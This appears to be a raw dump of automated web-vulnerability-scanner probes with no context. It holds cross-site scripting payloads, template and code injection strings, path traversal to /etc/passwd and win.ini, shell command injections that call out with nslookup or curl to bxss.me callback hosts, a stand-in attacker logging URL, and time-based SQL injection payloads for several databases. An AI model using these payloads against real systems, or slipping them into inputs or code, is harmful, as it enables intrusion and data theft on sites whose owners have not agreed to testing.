'"
<!--
response.write(9284982*9588073)
'+response.write(9284982*9588073)+'
"+response.write(9284982*9588073)+"
<% response.write(9284982*9588073) %>
+response.write(9284982*9588073)'
/../../../../../../../../../../windows/system32/BITSADMIN.exe
'"()&%<zzz><ScRiPt >JRk6(9664)</ScRiPt>
oWuYoXsJ
bPGZEDEH: Yvy8xASI
'"()&%<zzz><ScRiPt >JRk6(9877)</ScRiPt>
9739334
bfg9852<s1﹥s2ʺs3ʹhjl9852
<esi:include src="http://bxss.me/rpb.png"/>
bfgx3030%C0%BEz1%C0%BCz2a%90bcxhjl3030
<%={{={@{#{${dfb}}%>
<th:t="${dfb}#foreach
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
../../../../../../../../../../../../../../etc/passwd
${9999309+9999659}
dfb{{98991*97996}}xca
../../../../../../../../../../../../../../windows/win.ini
file:///etc/passwd
dfb[[${98991*97996}]]xca
dfb__${98991*97996}__::.x
echo xyzkus$()\ rzuqnj\nz^xyu||a #' &echo xyzkus$()\ rzuqnj\nz^xyu||a #|" &echo xyzkus$()\ rzuqnj\nz^xyu||a #
&echo zmsmwc$()\ xcnoaq\nz^xyu||a #' &echo zmsmwc$()\ xcnoaq\nz^xyu||a #|" &echo zmsmwc$()\ xcnoaq\nz^xyu||a #
../
|echo iokzmf$()\ bcxfuq\nz^xyu||a #' |echo iokzmf$()\ bcxfuq\nz^xyu||a #|" |echo iokzmf$()\ bcxfuq\nz^xyu||a #
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
./
expr 9000255157 - 989827
(nslookup -q=cname hitytbkgabyoi95412.bxss.me||curl hitytbkgabyoi95412.bxss.me))
<ScRiPt >JRk6(9556)</ScRiPt>
$(nslookup -q=cname hitlaczrfrrtqddb0e.bxss.me||curl hitlaczrfrrtqddb0e.bxss.me)
&nslookup -q=cname hitoxaisveqyi7df03.bxss.me&'\"`0&nslookup -q=cname hitoxaisveqyi7df03.bxss.me&`'
<WBCC4L>33HAC[!+!]</WBCC4L>
&(nslookup -q=cname hitjskepeunsycc8e5.bxss.me||curl hitjskepeunsycc8e5.bxss.me)&'\"`0&(nslookup -q=cname hitjskepeunsycc8e5.bxss.me||curl hitjskepeunsycc8e5.bxss.me)&`'
&n968913=v908155
|(nslookup -q=cname hitmevhgvnwqj754ea.bxss.me||curl hitmevhgvnwqj754ea.bxss.me)
`(nslookup -q=cname hitexyqcitjnw5467f.bxss.me||curl hitexyqcitjnw5467f.bxss.me)`
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
;(nslookup -q=cname hitzpunucehpm9f1c2.bxss.me||curl hitzpunucehpm9f1c2.bxss.me)|(nslookup -q=cname hitzpunucehpm9f1c2.bxss.me||curl hitzpunucehpm9f1c2.bxss.me)&(nslookup -q=cname hitzpunucehpm9f1c2.bxss.me||curl hitzpunucehpm9f1c2.bxss.me)
|(nslookup${IFS}-q${IFS}cname${IFS}hitwzxrhchedvbbf00.bxss.me||curl${IFS}hitwzxrhchedvbbf00.bxss.me)
&(nslookup${IFS}-q${IFS}cname${IFS}hitkucqpofvju851a3.bxss.me||curl${IFS}hitkucqpofvju851a3.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitkucqpofvju851a3.bxss.me||curl${IFS}hitkucqpofvju851a3.bxss.me)&`'
<script>JRk6(9440)</script>
<script>JRk6(9547)</script>9547
<ScR<ScRiPt>IpT>JRk6(9211)</sCr<ScRiPt>IpT>
<ScRiPt >JRk6(9267)</ScRiPt>
<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9706></ScRiPt>
HttP://bxss.me/t/xss.html?%00
bxss.me/t/xss.html?%00
"+"A".concat(70-3).concat(22*4).concat(101).concat(90).concat(114).concat(70)+(require"socket" Socket.gethostbyname("hitos"+"hdfmynvsc1370.bxss.me.")[3].to_s)+"
'+'A'.concat(70-3).concat(22*4).concat(107).concat(66).concat(99).concat(81)+(require'socket' Socket.gethostbyname('hitve'+'fmfjfvvr5c526.bxss.me.')[3].to_s)+'
<isindex type=image src=1 onerror=JRk6(9450)>
'A'.concat(70-3).concat(22*4).concat(121).concat(90).concat(109).concat(76)+(require'socket' Socket.gethostbyname('hitcx'+'vtbnnmsc7e861.bxss.me.')[3].to_s)
<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9308'>
ctime sleep p0 (I30 tp1 Rp2 .
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
<body onload=JRk6(9646)>
xfs.bxss.me
<img src=//xss.bxss.me/t/dot.gif onload=JRk6(9596)>
Create
Http://bxss.me/t/fit.txt
http://bxss.me/t/fit.txt?.jpg
<img src=xyz OnErRor=JRk6(9485)>
Create/.
redirtest.acx
<img/src=">" onerror=alert(9033)>
/etc/shells
../../../../../../../../../../../../../../etc/shells
c:/windows/win.ini
bxss.me
%0D%0A%3C%53%63%52%69%50%74%20%3E%4A%52%6B%36%289626%29%3C%2F%73%43%72%69%70%54%3E
)
\u003CScRiPt\JRk6(9238)\u003C/sCripT\u003E
!(()&&!|*|*|
^(#$!@#$)(()))******
<ScRiPt>JRk6(9835)</sCripT>
%F6<img zzz onmouseover=JRk6(98771) //%F6>
<input autofocus onfocus=JRk6(9509)>
'.gethostbyname(lc('hitsl'.'icnhjwtja8cc2.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(121).chr(70).chr(119).chr(82).'
<a HrEF=http://xss.bxss.me></a>
".gethostbyname(lc("hityl"."znalyzxf66448.bxss.me."))."A".chr(67).chr(hex("58")).chr(100).chr(85).chr(120).chr(76)."
gethostbyname(lc('hitsi'.'fbudgqty48d33.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(117).chr(81).chr(115).chr(66)
<a HrEF=jaVaScRiPT:>
}body{zzz:Expre/**/SSion(JRk6(9058))}
hJjEW <ScRiPt >JRk6(9427)</ScRiPt>
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
';print(md5(31337));$a='
";print(md5(31337));$a="
<WLHGBJ>IW8X5[!+!]</WLHGBJ>
${@print(md5(31337))}
<ifRAme sRc=9475.com></IfRamE>
${@print(md5(31337))}\
'.print(md5(31337)).'
<aHH4yGy x=9596>
<img sRc='http://attacker-9767/log.php?
<aVp8MYf<
'"()
'&&sleep(27*1000)*wznbrs&&'
"&&sleep(27*1000)*ewxewo&&"
'||sleep(27*1000)*itgacu||'
"||sleep(27*1000)*pgabfn||"
DESftVMG
*1
*1
*1
*1
-1 OR 2+724-724-1=0+0+0+1
-1 OR 3+724-724-1=0+0+0+1
*if(now()=sysdate(),sleep(15),0)
0'XOR( *if(now()=sysdate(),sleep(15),0))XOR'Z
0"XOR( *if(now()=sysdate(),sleep(15),0))XOR"Z
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
-1; waitfor delay '0:0:15' --
-1); waitfor delay '0:0:15' --
-1)); waitfor delay '0:0:15' --
-1 waitfor delay '0:0:15' --
YeqquURs'; waitfor delay '0:0:15' --
WFEg74vy'); waitfor delay '0:0:15' --
rXr13DId')); waitfor delay '0:0:15' --
-1 OR 584=(SELECT 584 FROM PG_SLEEP(15))--
-1) OR 696=(SELECT 696 FROM PG_SLEEP(15))--
-1)) OR 215=(SELECT 215 FROM PG_SLEEP(15))--
b4GqvEe9' OR 101=(SELECT 101 FROM PG_SLEEP(15))--
JT54eNai') OR 772=(SELECT 772 FROM PG_SLEEP(15))--
C1S50fU8')) OR 271=(SELECT 271 FROM PG_SLEEP(15))--
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
'"
%C0%A7%C0%A2%2527%2522\'\"
@@vfK7g